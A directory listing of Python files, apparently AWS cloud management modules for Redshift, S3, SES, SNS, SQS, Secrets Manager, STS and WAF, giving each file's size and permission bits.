redshift.py File 23.82 KB 0644
redshift_cross_region_snapshots.py File 6.7 KB 0644
redshift_info.py File 10.04 KB 0644
redshift_subnet_group.py File 8.18 KB 0644
s3_bucket_info.py File 20.69 KB 0644
s3_bucket_notification.py File 14.04 KB 0644
s3_cors.py File 4.18 KB 0644
s3_lifecycle.py File 26.91 KB 0644
s3_logging.py File 6.76 KB 0644
s3_metrics_configuration.py File 7.31 KB 0644
s3_sync.py File 18.77 KB 0644
s3_website.py File 11.37 KB 0644
secretsmanager_secret.py File 24.07 KB 0644
ses_identity.py File 22.99 KB 0644
ses_identity_policy.py File 7.39 KB 0644
ses_rule_set.py File 8.17 KB 0644
sns.py File 7.26 KB 0644
sns_topic.py File 27.72 KB 0644
sns_topic_info.py File 6.13 KB 0644
sqs_queue.py File 16.62 KB 0644
ssm_parameter.py File 19.82 KB 0644
stepfunctions_state_machine.py File 7.96 KB 0644
stepfunctions_state_machine_execution.py File 6.59 KB 0644
storagegateway_info.py File 11.46 KB 0644
sts_assume_role.py File 5.69 KB 0644
sts_session_token.py File 4.44 KB 0644
waf_condition.py File 29.29 KB 0644
waf_info.py File 4.27 KB 0644
waf_rule.py File 13.05 KB 0644
waf_web_acl.py File 12.41 KB 0644
wafv2_ip_set.py File 11.29 KB 0644
wafv2_ip_set_info.py File 3.93 KB 0644
wafv2_resources.py File 4.73 KB 0644
wafv2_resources_info.py File 3.11 KB 0644
wafv2_rule_group.py File 13.82 KB 0644
wafv2_rule_group_info.py File 4.64 KB 0644
wafv2_web_acl.py File 19.46 KB 0644
wafv2_web_acl_info.py File 3.95 KB 0644